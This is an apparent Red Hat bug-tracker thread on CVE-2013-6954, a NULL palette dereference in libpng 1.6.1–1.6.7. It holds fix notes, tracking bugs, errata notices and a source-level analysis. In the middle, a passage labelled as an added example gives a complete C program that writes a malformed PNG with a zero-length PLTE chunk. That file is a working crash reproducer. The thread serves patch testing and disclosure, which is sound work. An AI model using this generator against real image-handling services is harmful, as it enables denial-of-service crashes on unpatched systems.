libpng 1.6.8 was released [1] and notes the following fix:

Handle zero-length PLTE chunk or NULL palette with png_error() instead of png_chunk_report(), which by default issues a warning rather than an error, leading to later reading from a NULL pointer (png_ptr->palette) in png_do_expand_palette().

This is CVE-2013-6954 and VU#650142 [2]. The git commit to fix it is available [3].

[1] http://sourceforge.net/projects/libpng/files/libpng16/1.6.8/Gnupg/
[2] http://www.kb.cert.org/vuls/id/650142
[3] http://sourceforge.net/p/libpng/code/ci/1faa6ff32c648acfe3cf30a58d31d7aebc24968c
In Fedora we currently have libpng 1.6.8. https://bugzilla.redhat.com/show_bug.cgi?id=1033049 When the BZ for RHEL 7 and older is created, libpng will be patched.
Created mingw-libpng tracking bugs for this issue: Affects: fedora-19 [bug 1056858] Affects: fedora-20 [bug 1056859]
Created mingw32-libpng tracking bugs for this issue: Affects: epel-all [bug 1056860]
Created libpng tracking bugs for this issue: Affects: fedora-20 [bug 1056853] Affects: fedora-19 [bug 1056854]
Created libpng10 tracking bugs for this issue: Affects: fedora-all [bug 1056857] Affects: epel-6 [bug 1056861]
Created libpng12 tracking bugs for this issue: Affects: fedora-all [bug 1056856]
Created libpng15 tracking bugs for this issue: Affects: fedora-20 [bug 1056855]
Does anyone have a reproducer image for the null/empty palette issues, so I can test a fix for libpng10 (which has slightly different code)?
libpng10-1.0.60-6.fc19 has been pushed to the Fedora 19 stable repository. If problems still persist, please make note of it in this bug report.
libpng10-1.0.60-6.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
Created attachment 860584: tarball with testcase

Had to put the file in a tarball, as Firefox was trying to preview it and crashing, as expected.
Upstream tells me that only libpng 1.6.1 to 1.6.7 were affected by this issue. I've just tried an unpatched libpng 1.0.61 with xv, which had no problem loading the testcase image.
Based on the reproducer posted in comment #19, it seems that this issue only affects libpng-1.6. It does not affect older versions of libpng. Statement: Not Vulnerable. This issue does not affect the version of libpng as shipped with Red Hat Enterprise Linux 5 and 6.
libpng10-1.0.61-1.el6 has been pushed to the Fedora EPEL 6 stable repository. If problems still persist, please make note of it in this bug report.
mingw-libpng-1.6.10-1.fc20 has been pushed to the Fedora 20 stable repository. If problems still persist, please make note of it in this bug report.
Analysis:

libpng-1.2:
===========

png_set_PLTE() is called with num_palette=0. Later, at:

    454 if (num_palette < 0 || num_palette > PNG_MAX_PALETTE_LENGTH)

the bounds of num_palette are checked; there is no check for num_palette=0 though. Then memory is malloced for the png_ptr->palette structure at:

    477 png_ptr->palette = (png_colorp)png_calloc(png_ptr,
    478     PNG_MAX_PALETTE_LENGTH * png_sizeof(png_color));

This mallocs 256 * 3 bytes of memory for the png_ptr->palette structure. Later, at:

    479 png_memcpy(png_ptr->palette, palette, num_palette * png_sizeof(png_color));

zero bytes are copied into png_ptr->palette because num_palette = 0, so this memcpy looks like:

    png_memcpy(png_ptr->palette, palette, 0)

So png_ptr->palette is filled with 256 * 3 zeros (due to calloc). Later, when this structure is referenced in png_do_expand_palette(), the output is zero and there is no crash.

libpng 1.6:
===========

Here in png_set_PLTE() there is a check for num_palette = 0 at:

    523 if ((num_palette > 0 && palette == NULL) ||
    524     (num_palette == 0
    525 # ifdef PNG_MNG_FEATURES_SUPPORTED
    526     && (png_ptr->mng_features_permitted & PNG_FLAG_MNG_EMPTY_PLTE) == 0
    527 # endif
    528     ))
    529 {
    530     png_chunk_report(png_ptr, "Invalid palette", PNG_CHUNK_ERROR);
    531     return;
    532 }

So when num_palette is zero, a warning is printed and the function exits. However, no memory is malloced for the png_ptr->palette structure, and it is pointing to zero. Later, when it is referenced in png_do_expand_palette(), there is a null pointer deref and it crashes.
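To exercise the zero-length PLTE path described in the analysis above, here is a small generator (an added example; it is not from libpng, from the bug reporter, or from the attached testcase tarball) that writes a minimal 1x1, 8-bit, colour-type-3 PNG whose PLTE chunk carries zero entries. Every byte is hand-assembled: IHDR, the empty PLTE, an IDAT holding a single stored-block zlib stream for one scanline, and IEND, with the PNG CRC-32 computed over each chunk's type and data. The function names (png_crc32, put_chunk, build_empty_plte_png) and the output filename are this example's own assumptions.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* CRC-32 as specified by PNG (reflected, polynomial 0xEDB88320),
 * computed over the chunk type and chunk data, not over the length field. */
uint32_t png_crc32(const uint8_t *buf, size_t len)
{
    uint32_t c = 0xFFFFFFFFu;
    for (size_t i = 0; i < len; i++) {
        c ^= buf[i];
        for (int k = 0; k < 8; k++)
            c = (c >> 1) ^ (0xEDB88320u & (0u - (c & 1u)));
    }
    return c ^ 0xFFFFFFFFu;
}

static void put_be32(uint8_t *p, uint32_t v)
{
    p[0] = (uint8_t)(v >> 24); p[1] = (uint8_t)(v >> 16);
    p[2] = (uint8_t)(v >> 8);  p[3] = (uint8_t)v;
}

/* Append one chunk (length, type, data, CRC) at out; returns bytes written. */
static size_t put_chunk(uint8_t *out, const char *type, const uint8_t *data, uint32_t len)
{
    put_be32(out, len);
    memcpy(out + 4, type, 4);
    if (len)
        memcpy(out + 8, data, len);
    put_be32(out + 8 + len, png_crc32(out + 4, 4 + len));
    return 12 + len;
}

/* Assemble a 1x1, 8-bit, colour-type-3 (palette) PNG whose PLTE chunk has
 * length 0, i.e. zero palette entries. Returns the image size, or 0 if the
 * buffer is too small. All bytes are constructed for this example. */
size_t build_empty_plte_png(uint8_t *out, size_t cap)
{
    static const uint8_t sig[8] = { 0x89, 'P', 'N', 'G', 0x0D, 0x0A, 0x1A, 0x0A };
    /* width 1, height 1, bit depth 8, colour type 3, compression/filter/interlace 0 */
    static const uint8_t ihdr[13] = { 0, 0, 0, 1, 0, 0, 0, 1, 8, 3, 0, 0, 0 };
    /* zlib stream: header 78 01, one final stored block (LEN=2, NLEN=~2) holding
     * the single scanline "filter 0, palette index 0", then Adler-32 of 00 00. */
    static const uint8_t idat[] = { 0x78, 0x01, 0x01, 0x02, 0x00, 0xFD, 0xFF,
                                    0x00, 0x00, 0x00, 0x02, 0x00, 0x01 };
    size_t need = sizeof sig + (12 + sizeof ihdr) + 12 + (12 + sizeof idat) + 12;
    if (cap < need)
        return 0;

    size_t n = 0;
    memcpy(out, sig, sizeof sig);
    n += sizeof sig;
    n += put_chunk(out + n, "IHDR", ihdr, sizeof ihdr);
    n += put_chunk(out + n, "PLTE", NULL, 0);      /* the zero-length palette */
    n += put_chunk(out + n, "IDAT", idat, sizeof idat);
    n += put_chunk(out + n, "IEND", NULL, 0);
    return n;
}

int main(int argc, char **argv)
{
    const char *path = argc > 1 ? argv[1] : "empty-plte.png";  /* example filename */
    uint8_t buf[128];
    size_t n = build_empty_plte_png(buf, sizeof buf);
    FILE *f = fopen(path, "wb");
    if (n == 0 || f == NULL) {
        perror(path);
        return 1;
    }
    fwrite(buf, 1, n, f);
    fclose(f);
    printf("wrote %zu bytes to %s\n", n, path);
    return 0;
}
```

Whether a reader falls over on the resulting file depends on its libpng version and on whether it asks for palette expansion: png_do_expand_palette() only runs when the application enables the expand transform (png_set_expand() or png_set_palette_to_rgb()), and per the comments above only unpatched libpng 1.6.1 to 1.6.7 leave png_ptr->palette NULL on this input. Older libpng calloc()s a full-size palette first and so reads zeros instead.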
This issue has been addressed in the following products:

Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5

Via RHSA-2014:0413 https://rhn.redhat.com/errata/RHSA-2014-0413.html
This issue has been addressed in the following products:

Supplementary for Red Hat Enterprise Linux 6
Supplementary for Red Hat Enterprise Linux 5

Via RHSA-2014:0412 https://rhn.redhat.com/errata/RHSA-2014-0412.html
OpenJDK upstream commit: http://hg.openjdk.java.net/jdk8u/jdk8u/jdk/rev/df3f9871ee6f
This issue has been addressed in the following products:

Oracle Java for Red Hat Enterprise Linux 6
Oracle Java for Red Hat Enterprise Linux 5

Via RHSA-2014:0414 https://rhn.redhat.com/errata/RHSA-2014-0414.html
This issue has been addressed in the following products:

Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6

Via RHSA-2014:0486 https://rhn.redhat.com/errata/RHSA-2014-0486.html
This issue has been addressed in the following products:

Supplementary for Red Hat Enterprise Linux 5
Supplementary for Red Hat Enterprise Linux 6

Via RHSA-2014:0508 https://rhn.redhat.com/errata/RHSA-2014-0508.html
*** Bug 1106391 has been marked as a duplicate of this bug. ***
This issue has been addressed in the following products:

Supplementary for Red Hat Enterprise Linux 7

Via RHSA-2014:0705 https://rhn.redhat.com/errata/RHSA-2014-0705.html
This issue has been addressed in the following products:

Red Hat Network Satellite Server v 5.4
Red Hat Network Satellite Server v 5.5
Red Hat Satellite Server v 5.6

Via RHSA-2014:0982 https://rhn.redhat.com/errata/RHSA-2014-0982.html